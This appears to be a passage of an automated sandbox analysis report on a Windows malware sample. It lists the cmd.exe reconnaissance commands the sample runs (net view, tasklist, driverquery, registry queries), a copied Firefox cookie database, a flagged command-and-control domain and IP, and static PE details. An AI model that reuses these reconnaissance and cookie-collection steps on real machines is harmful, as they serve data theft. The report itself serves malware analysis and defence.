cmd.exe (PID: 324 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3840 cmdline: cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

net.exe (PID: 3956 cmdline: net view MD5: B9A4DAC2192FD78CDA097BFA79F6E7B2)

cmd.exe (PID: 3996 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 1164 cmdline: cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

nslookup.exe (PID: 3752 cmdline: nslookup 127.0.0.1 MD5: 5E3830EE3282A53920E00784FEC44CFD)

cmd.exe (PID: 3896 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 1600 cmdline: cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

tasklist.exe (PID: 1968 cmdline: tasklist.exe /SVC MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

cmd.exe (PID: 4032 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3576 cmdline: cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

driverquery.exe (PID: 2012 cmdline: driverquery.exe MD5: 5D1CFD8CF86F05BB27926C9A6893B635)

cmd.exe (PID: 3928 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 2496 cmdline: cmd /C 'reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

reg.exe (PID: 1668 cmdline: reg.exe query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' /s MD5: D69A9ABBB0D795F21995C2F48C1EB560)

cmd.exe (PID: 3120 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 608 cmdline: cmd /C 'reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

reg.exe (PID: 3524 cmdline: reg.exe query 'HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall' /s MD5: D69A9ABBB0D795F21995C2F48C1EB560)

cmd.exe (PID: 812 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\C60A.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Temp\5F76.bin Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	159
Entropy (8bit):	5.054319599962191
Encrypted:	false
MD5:	D09C3E6F8C7111B2DB30B2D3601CC987
SHA1:	E2C675D03518D29BA2D14D4BDC63FDCB675B2B6D
SHA-256:	82DA6D5742114A473C1E2817655021EEA018626B76F896A2FFE183D9026A3F2D
SHA-512:	6F137C195EADF65E7EBC07E14DE8E19968CDCCCDD19437EF01D2411D09734990E1217F0C46A045E013EE8FC7DE51555EAC1C51464F7290BEE4542AFEC79B96AD
Malicious:	false
Reputation:	low
Preview:	.set MaxDiskSize=0...set DiskDirectory1="C:\Users\user~1\AppData\Local\Temp"...set CabinetName1="681A.bin".."C:\Users\user~1\AppData\Local\Temp\C60A.bin"..

C:\Users\user\AppData\Local\Temp\C60A.bin Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII news text, with very long lines, with CRLF line terminators
Size (bytes):	77642
Entropy (8bit):	5.03702115025166
Encrypted:	false
MD5:	0D0D607C072B2A224C81DE53E197DB44
SHA1:	5466BAE567C4A04C59EEBAFF6AAF9A862B5F58CF
SHA-256:	542ACE99CEB2CA4F5171337CD87C1A0F4F4045D78109D955C9B8EFAA34DD9CD7
SHA-512:	71FB8878F1E5D2990956C6075F33BF1834821356D3CDE5555C7F25D64BB17BA53DC3090D4492506AC319AD82227D91C0404CA42CD4619A7D3C79E4932072D30C
Malicious:	false
Reputation:	low
Preview:	..Host Name: 715575..OS Name: Microsoft Windows 7 Professional ..OS Version: 6.1.7601 Service Pack 1 Build 7601..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: admin..Registered Organization: ..Product ID: 00371-O5M-9000752-95802..Original Install Date: 1/1/1601, 12:00:00 AM..System Boot Time: 6/27/2019, 1:22:19 PM..System Manufacturer: gExFScMrxa2lnLa..System Model: eg3wsF5O..System Type: X86-based PC..Processor(s): 1 Processor(s) Installed... [01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2394 Mhz..BIOS Version: KR89T EPNVG, 12/1/2006..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume1..System Locale:

C:\Users\user\AppData\Local\Temp\C60A.bin1 Download File
Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	11
Entropy (8bit):	1.2776134368191157
Encrypted:	false
MD5:	5B3345909519932D6670D92F16496463
SHA1:	6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD
SHA-256:	0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
SHA-512:	B41A0E9BA8A092E134E9403EA3C1B080B8F2D1030CE14AFA2647B282F66A76C48A4419D5D0F7C3C78412A427F4B84B8B48349B76FF2C3FD1DA9EC80D2AB14A6B
Malicious:	false
Reputation:	low
Preview:	-------- ..

C:\Users\user\AppData\Roaming\Microsoft\{A29E757B-998D-241A-33F6-DD98178A614C}\cookie.ff\22qkc0w7.default\cookies.sqlite Download File
Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, user version 5
Size (bytes):	524288
Entropy (8bit):	0.027066873966569035
Encrypted:	false
MD5:	F44EA3853EDEC64521D77BE37417D577
SHA1:	53ECAC6D5E3BEFACD893E890D26E745508013676
SHA-256:	A151C9B2E25BF98E64F76B5CF3F23D5529BD68220DB595C894FA7F84DBEAEA44
SHA-512:	F71AC3937ED6AB4BE12E3C7F8705ACE7BB5DFD7DD19E4843E976814061C8FA8B8A92B029A4324459940708661AE71880DF41338E8D4CF5A8F1ECF3AB561F4CA7
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ .........................................................................-.......}..~E..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pilodirsob.com	5.188.60.53	true	true	unknown
1.0.0.127.in-addr.arpa	unknown	unknown	true	unknown
8.8.8.8.in-addr.arpa	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.mercadolivre.com.br/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.ebay.de/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.mtv.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.rambler.ru/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.nifty.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.dailymail.co.uk/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www3.fnac.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://buscar.ya.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://constitution.org/usdeclar.txtC:	explorer.exe, 00000002.00000002.1544224987.01596000.00000004.sdmp	false	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://asp.usatoday.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://fr.search.yahoo.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://rover.ebay.com	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://in.search.yahoo.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.ebay.in/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://%s.com	explorer.exe, 00000003.00000000.1514376422.05310000.00000008.sdmp	false	high
http://msk.afisha.ru/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://policy.camerfirma.com0	explorer.exe, 00000003.00000000.1512922741.046ED000.00000004.sdmp	false	unknown
http://search.rediff.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.alexisisaac.net	C60A.bin.3.dr	false	unknown
http://www.ya.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://it.search.dada.net/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.naver.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.google.ru/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.abril.com.br/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.daum.net/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.naver.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.clarin.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://buscar.ozu.es/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://kr.search.yahoo.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.about.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://busca.igbusca.com.br/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.ask.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.cjmall.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.centrum.cz/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://suche.t-online.de/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.google.it/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.auction.co.kr/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.ceneo.pl/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.amazon.de/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://sads.myspace.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
https://java.sun.com	C60A.bin.3.dr	false	unknown
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://google.pchome.com.tw/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://uk.search.yahoo.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://html4/loose.dtd	explorer.exe, explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	false	low
http://espanol.search.yahoo.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.ozu.es/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.sify.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.ebay.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.gmarket.co.kr/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.nifty.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://searchresults.news.com.au/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.google.si/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.google.cz/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.soso.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.univision.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.ebay.it/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.asharqalawsat.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://.css	explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	false	low
http://busca.orange.es/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000003.00000000.1514376422.05310000.00000008.sdmp	false	high
http://search.yahoo.co.jp	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.target.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://buscador.terra.es/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.iask.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.tesco.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.seznam.cz/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.quovadisglobal.com/cps0	explorer.exe, 00000003.00000000.1512922741.046ED000.00000004.sdmp	false	high
http://search.interpark.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.espn.go.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.myspace.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://p.zhongsou.com/favicon.ico	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://service2.bfast.com/	explorer.exe, 00000003.00000000.1514674223.053C9000.00000008.sdmp	false	high
http://www.%s.comPA	explorer.exe, 00000003.00000000.1502801306.01D30000.00000008.sdmp	false	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
5.188.60.53	Russian Federation		62088	unknown	true

Private

IP
127.0.0.1

Static File Info

General
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):	7.512686634305566
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Java Script embedded in Visual Basic Script (1500/0) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rb5iJg6pgN.exe
File size:	1158144
MD5:	879d9a2c75ee83443a0a913f5dc71b5c
SHA1:	41c124f8b5341773046ac9c6b5924b7919e0ac15
SHA256:	53f7d917ad9ebf5b7d2ccc1a835083bc0c0b92cc69ee584703ea6e4345f5c457
SHA512:	1f84756f6f30b6bff2cf3d5796549c96672e6fe4b6ebaa55f3b2d2f8e5ea034dd8086d5985f640f2c37b58eac0af089ab48ae5a730403e86b0939923b2f3c69a
SSDEEP:	24576:GmZ5G43EgTDD55vd9lTTwTJvLqWZlzSq05sRlKi9AwvjUkSSX:jZ5rEgPfd9lTmvLq2lY0l+0X
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.mk...8...8...8.w.87..8...8...8.w.8F..8.w.8...8...8...8...8...8g_.8...8g_.8...8...8...8g_.8...8Rich...8................PE..L..

File Icon


Icon Hash:	0000000000000000

Static PE Info

General
Entrypoint:	0x435c58
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5CEB9756 [Mon May 27 07:52:54 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	f716ba60b7f16c8a90094437582b28f7

Entrypoint Preview

Instruction
call 5F1ADD01h
jmp 5F1A3B05h
push 00000014h
push 004677A0h
call 5F1A7067h
call 5F1A5789h
movzx esi, ax
push 00000002h
call 5F1ADC94h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 5F1A3B06h
xor ebx, ebx
jmp 5F1A3B35h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 5F1A3AEDh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 5F1A3ADFh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 5F1A3B0Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 5F1AA374h
test eax, eax
jne 5F1A3B0Ah
push 0000001Ch
call 5F1A3BE1h
pop ecx
call 5F1AAB72h
test eax, eax
jne 5F1A3B0Ah
push 00000010h
call 5F1A3BD0h
pop ecx
call 5F1A97F1h
and dword ptr [ebp-04h], 00000000h
call 5F1A8035h
test eax, eax
jns 5F1A3B0Ah
push 0000001Bh
call 5F1A3BB6h
pop ecx
call dword ptr [0044D16Ch]
mov dword ptr [0046C9D4h], eax
call 5F1ADCE6h
mov dword ptr [0046BAF8h], eax
call 5F1AD8E7h
test eax, eax
jns 5F1A3B0Ah

Rich Headers

Programming Language:

[RES] VS2012 UPD4 build 61030
[C++] VS2012 UPD4 build 61030
[ C ] VS2008 SP1 build 30729
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x67d2c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6e000	0xab650	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11a000	0x2ca8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x66050	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4d000	0x290	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4c000	0x4c000	False	0.51803749486	ump; data	6.56856854584	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x4d000	0x1bc24	0x1be00	False	0.555177970852	ump; ACB archive data	6.29298955089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x69000	0x4a00	0x1c00	False	0.317103794643	ump; data	3.76908810963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x6e000	0xab650	0xab800	False	0.930057625729	ump; data	7.84161700641	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11a000	0x5580	0x5600	False	0.414471293605	ump; data	4.31039869015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x6ea50	0x137b	ump; PNG image, 438 x 240, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x6fdcc	0x1766	ump; PNG image, 365 x 200, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x71534	0x443	ump; PNG image, 32 x 32, 8-bit/color RGBA, non-interlaced	English	United States
PNG	0x71978	0x3b9	ump; PNG image, 40 x 40, 8-bit/color RGBA, non-interlaced	English	United States
PNG	0x71d34	0x172	ump; PNG image, 40 x 40, 8-bit/color RGBA, non-interlaced	English	United States
PNG	0x71ea8	0x286	ump; PNG image, 48 x 48, 8-bit/color RGBA, non-interlaced	English	United States
SCID	0x72130	0x10f1a	ump; data	English	United States
SCID	0x8304c	0x5852	ump; data	English	United States
SCID	0x888a0	0x8f04	ump; data	English	United States
SCID	0x917a4	0xf2da	ump; data	English	United States
SCID	0xa0a80	0x10a46	ump; data	English	United States
SCID	0xb14c8	0x5802	ump; data	English	United States
SCID	0xb6ccc	0x643e	ump; data	English	United States
SCID	0xbd10c	0xa08c	ump; data	English	United States
XML	0xc7198	0xd181	ump; data	English	United States
XML	0xd431c	0x131b0	ump; data	English	United States
XML	0xe74cc	0xed0e	ump; data	English	United States
XML	0xf61dc	0xbc11	ump; data	English	United States
XML	0x101df0	0xaf12	ump; data	English	United States
RT_ICON	0x10cd04	0x1915	ump; PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x10e61c	0x468	ump; GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x10ea84	0x25a8	ump; data	English	United States
RT_ICON	0x11102c	0x10a8	ump; data	English	United States
RT_ICON	0x1120d4	0x2868	ump; data	English	United States
RT_ICON	0x11493c	0x4228	ump; data	English	United States
RT_ACCELERATOR	0x118b64	0x10	ump; data	English	United States
RT_ACCELERATOR	0x118b74	0x180	ump; data	English	United States
RT_ACCELERATOR	0x118cf4	0x50	ump; data	English	United States
RT_ACCELERATOR	0x118d44	0x8	ump; DBase 3 data file with memo(s) (38 records)	English	United States
RT_ACCELERATOR	0x118d4c	0x50	ump; DBase 3 data file (7 records)	English	United States
RT_ACCELERATOR	0x118d9c	0x48	ump; data	English	United States
RT_ACCELERATOR	0x118de4	0x18	ump; data	English	United States
RT_ACCELERATOR	0x118dfc	0x48	ump; data	English	United States
RT_ACCELERATOR	0x118e44	0x18	ump; DBase 3 data file (58114 records)	English	United States
RT_ACCELERATOR	0x118e5c	0x120	ump; data	English	United States
RT_GROUP_ICON	0x118f7c	0x5a	ump; MS Windows icon resource - 6 icons, 256-colors	English	United States
RT_VERSION	0x118fd8	0x404	ump; data	English	United States
RT_MANIFEST	0x1193dc	0x271	ump; XML document text	English	United States

Imports

DLL	Import
KERNEL32.dll	GetProcessHeap, GetOEMCP, GetACP, IsValidCodePage, SetFilePointerEx, ReadFile, GetFileType, GetConsoleMode, GetConsoleCP, FlushFileBuffers, IsDebuggerPresent, HeapSize, GetModuleFileNameW, WriteFile, GetStdHandle, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, SetFilePointer, DeleteFileW, ReadConsoleW, OutputDebugStringW, LoadLibraryW, SetStdHandle, WriteConsoleW, CreateFileW, SetEndOfFile, GetUserDefaultLangID, EnumTimeFormatsA, QueryPerformanceCounter, GetPriorityClass, CreateEventA, CloseHandle, GetFileInformationByHandle, LoadResource, WaitForSingleObject, GetLastError, GetCurrentProcess, VirtualAlloc, IsProcessorFeaturePresent, GetModuleHandleW, GetStartupInfoW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, TerminateProcess, SetLastError, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCPInfo, FindResourceExW, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, GetCommandLineA, LoadLibraryExW, GlobalAlloc, LCMapStringW, GetModuleFileNameA, InterlockedIncrement, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, Sleep, EncodePointer, DecodePointer, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, HeapFree, HeapAlloc, RaiseException, RtlUnwind, GetSystemTimeAsFileTime, GetCurrentThreadId
USER32.dll	BeginDeferWindowPos, MoveWindow, TranslateMessage, ShowWindow, DrawFrameControl, wsprintfA, DestroyWindow, DefWindowProcA, GetScrollInfo, SetScrollInfo, LoadImageA, GetClassNameA, SetWindowLongA, GetCursorPos, MessageBoxA, GetClientRect, SetWindowTextA, DeferWindowPos, ScrollWindow, RedrawWindow, UpdateWindow, GetSubMenu, EnableMenuItem, CheckMenuItem, GetMenu, GetSystemMetrics, TranslateAcceleratorA, CreateAcceleratorTableA, SendInput, SetFocus, GetDialogBaseUnits, SendDlgItemMessageA, SetDlgItemTextA, DialogBoxIndirectParamA, CreateDialogParamA, EndDeferWindowPos, SendMessageA
GDI32.dll	GetTextFaceA, SetWindowExtEx, TextOutA, SetAbortProc, SetTextColor, SetStretchBltMode, SetMapMode, SelectObject, GetViewportOrgEx, DescribePixelFormat, DeleteObject, CreateRectRgn, CreateFontIndirectA, CombineRgn, GetViewportExtEx
COMDLG32.dll	ChooseColorA, GetOpenFileNameA
ADVAPI32.dll	CryptSetKeyParam, CryptEncrypt, CryptImportKey, CryptDestroyKey, CryptReleaseContext, CryptAcquireContextA
